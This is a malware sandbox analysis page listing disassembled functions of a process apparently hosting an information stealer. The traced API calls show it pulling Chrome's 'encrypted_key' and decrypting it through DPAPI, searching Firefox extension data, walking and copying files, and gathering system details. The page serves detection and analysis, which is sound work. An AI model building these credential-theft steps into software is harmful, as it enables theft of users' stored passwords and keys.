Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: ae1263dee446838ec3d2ed0d3023d6d9d2c1311e6054eecbf7098a463d231925
Instruction ID: 840be8f278d6102b2803bad9edab2d46aea7c0facff03edf0f672f7d5a833120
Opcode Fuzzy Hash: ae1263dee446838ec3d2ed0d3023d6d9d2c1311e6054eecbf7098a463d231925
Instruction Fuzzy Hash: D621F972741214ABEB14AF24DC88BAEB3F9FB46714F50112AF947A7A40DF709C0487D0

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 0040821B
, xrefs: 00408241
"encrypted_key":", xrefs: 004081DF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

